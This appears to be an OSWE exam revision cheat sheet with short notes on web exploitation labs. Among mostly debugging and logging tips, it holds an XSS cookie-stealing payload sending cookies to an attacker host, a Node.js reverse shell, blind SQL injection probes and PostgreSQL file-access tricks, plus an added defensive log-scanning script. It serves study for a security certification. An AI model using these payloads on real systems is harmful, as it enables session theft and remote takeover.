OSWE cheat sheet: module-by-module short notes for quick revision before the exam:
Module : Atmail (PHP):
- Access and alert the cookie (the HttpOnly flag must be disabled in the Set-Cookie header for document.cookie to expose it)
<script>alert(document.cookie);</script>
- Run an HTTP server with Python 3
python3 -m http.server
- Embedded cookie-stealing payload in an image tag
function addImage() {
    var img = document.createElement('img');
    img.src = 'http://AttackerIP:port/' + document.cookie;
    document.body.appendChild(img);
}
addImage();
- Set a cookie from the web developer console
javascript:void(document.cookie="cookiename=value");
- XHR POST request
xhr = new XMLHttpRequest();
xhr.open("POST", url, true);
xhr.send(data);
- XHR GET request
xhr = new XMLHttpRequest();
xhr.open("GET", url, true);
xhr.send();
Module : ATutor Authentication Bypass and RCE (PHP) :
- Enable MySQL query logging
nano /etc/mysql/my.cnf   # uncomment or add the lines below
[mysqld]
general_log_file = /var/log/mysql/mysql.log
general_log = 1
systemctl restart mysql   # restart MySQL
tail -f /var/log/mysql/mysql.log   # follow the MySQL log
- Enable verbose PHP errors
nano /etc/php5/apache2/php.ini   # uncomment or add the line below
display_errors = On
systemctl restart apache2   # restart Apache
- Print statement in PHP
echo "any message";
- Dump information about a variable
var_dump($var);
- Search for a function definition in the code
grep -rnw "function name(" ./ --color   # replace "name" with the function name
- Check whether magic quotes are enabled
var_dump(get_magic_quotes_gpc()); /** a value of 1 means enabled **/
- MySQL query without spaces (comments used as whitespace)
mysql> select/**/1;
- Extract the first character of the MySQL version in a blind (boolean) MySQL query
mysql> select ascii(substring((select version()),1,1))=53; /** 53 is ASCII '5'; use with an "or" boolean condition **/
- Create a ZIP file using Python 2
#!/usr/bin/python
import zipfile
from cStringIO import StringIO

def build_zip():
    f = StringIO()
    z = zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED)
    z.writestr('folder/file.txt', 'secret')   # path and content inside the archive
    z.close()
    out = open('zip.zip', 'wb')
    print f.getvalue()
    out.write(f.getvalue())
    out.close()

build_zip()
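Added example (not part of the original notes): a small Python 3 script that reads MySQL general_log lines, such as the log enabled at the top of this module, and flags the two query shapes shown above, comments used as whitespace and ascii(substring(...)) character probing. The sample log lines are constructed for the example, and the line format and regex rules are my own assumptions about the MySQL 5.7+ general_log layout.

```python
import re

# Constructed sample lines in MySQL general_log format (time, thread id, command, argument).
# These are made up for the example, not taken from a real server.
SAMPLE_LOG = """\
2024-01-01T10:00:00.000001Z\t   7 Connect\tatutor@localhost on atutor
2024-01-01T10:00:01.000002Z\t   7 Query\tSELECT id FROM members WHERE login = 'alice'
2024-01-01T10:00:02.000003Z\t   7 Query\tselect/**/1
2024-01-01T10:00:03.000004Z\t   7 Query\tSELECT id FROM members WHERE login = '' or ascii(substring((select version()),1,1))=53 -- '
2024-01-01T10:00:04.000005Z\t   7 Query\tSELECT /* app comment */ name FROM courses
"""

# Assumed layout: <timestamp> <thread id> <command><TAB><argument>
LINE_RE = re.compile(r"^(?P<time>\S+)\s+(?P<thread>\d+)\s+(?P<cmd>\w+)\t(?P<arg>.*)$")

# Heuristics tied to the tricks in this module: a comment with a word character on
# both sides (comment used instead of a space) and ascii(substring(...)) probing.
RULES = {
    "comment-as-space": re.compile(r"\w/\*.*?\*/\w", re.S),
    "blind-char-probe": re.compile(r"ascii\s*\(\s*substr(ing)?\s*\(", re.I),
}


def parse_general_log(text):
    """Yield (thread, command, argument) for each well-formed general_log line."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m.group("thread"), m.group("cmd"), m.group("arg")


def flag_queries(text):
    """Return [(thread, rule_name, query)] for Query entries that match a rule."""
    hits = []
    for thread, cmd, arg in parse_general_log(text):
        if cmd != "Query":
            continue
        for name, pattern in RULES.items():
            if pattern.search(arg):
                hits.append((thread, name, arg))
    return hits


if __name__ == "__main__":
    for thread, rule, query in flag_queries(SAMPLE_LOG):
        print("thread %s [%s]: %s" % (thread, rule, query))
```

The ordinary application comment on the last sample line is not flagged because it is surrounded by spaces, which keeps the comment-as-space rule from firing on normal queries.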
Module : PHP Type Juggling Vulnerability :
- Configure an SMTP debugging server (the trailing & runs it in the background)
sudo python3 -m smtpd -n -c DebuggingServer 0.0.0.0:25 &
Module : ManageEngine Application Manager AMUserResourcesSyncServlet SQL (Postgres) Injection & RCE :
- web.xml determines how URLs are mapped to servlets
- Use the JD-GUI tool to decompile Java classes
- Find SQL injection candidates using the regular expression below
^.?query.?select.*?
- Enable PostgreSQL statement logging by uncommenting the line below in postgresql.conf
log_statement = 'all'
- PostgreSQL CLI
psql -U username -p 15432   # -p = port
- An alternative to the single quote (') is the double dollar sign ($$) used for dollar quoting
- Decode a string in PostgreSQL
select convert_from(decode('QVdBRQ==', 'base64'), 'utf-8');
- Using CHR and string concatenation
SELECT CHR(65) || CHR(87) || CHR(65) || CHR(69);
- Accessing the file system in PostgreSQL
COPY <table_name> FROM '<file_name>';
COPY <table_name> TO '<file_name>';
- PostgreSQL extensions (user-defined function backed by a shared library)
CREATE OR REPLACE FUNCTION test(text) RETURNS void AS 'FILENAME', 'test' LANGUAGE 'C' STRICT;
Module : The Bassmaster Plugin (Nodejs) :
- JavaScript reverse shell
var net = require("net"), sh = require("child_process").exec("/bin/bash");
var client = new net.Socket();
client.connect(53, "attackerip", function() {
    client.pipe(sh.stdin);
    sh.stdout.pipe(client);
    sh.stderr.pipe(client);
});
Module : DotNetNuke Cookie Deserialization RCE :
- XmlSerializer limitations
XmlSerializer is only able to serialize public properties and fields of an object.
- For a better debugging experience, modify the Debuggable attribute of the DLL in the dnSpy tool
[assembly: Debuggable(DebuggableAttribute.DebuggingModes.Default | DebuggableAttribute.DebuggingModes.DisableOptimizations | DebuggableAttribute.DebuggingModes.IgnoreSymbolStoreSequencePoints | DebuggableAttribute.DebuggingModes.EnableEditAndContinue)]
- XML serialization and deserialization methods (.NET)
XmlSerializer.Serialize(writer, obj) and XmlSerializer.Deserialize(reader)
- Java serialization and deserialization methods
Deserialization: objectInputStream.readObject(); serialization: objectOutputStream.writeObject(obj)
Module : ERPNext Authentication Bypass and Server Side Template Injection :
- Run SMTP Server on Kali
sudo python3 -m smtpd -n -c DebuggingServer 0.0.0.0:25